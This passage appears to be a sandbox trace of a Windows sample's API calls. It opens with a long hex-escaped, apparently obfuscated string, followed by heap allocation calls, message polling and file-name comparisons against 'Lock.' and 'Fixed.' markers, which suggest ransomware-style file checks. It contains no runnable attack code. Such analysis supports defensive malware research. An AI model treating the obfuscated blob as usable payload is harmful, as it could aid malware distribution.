36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0199.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.476] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0199.477] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.477] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ie7x9Fbl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e7x9Fbl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7x9Fbl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9Fbl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.477] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Fbl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fbl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bl.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0199.478] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a) returned 0x24b4870 [0199.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ie7x9Fbl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e7x9Fbl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7x9Fbl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9Fbl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Fbl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fbl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bl.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0199.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.483] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0199.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0199.483] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0199.483] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.484] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0199.484] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.484] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd 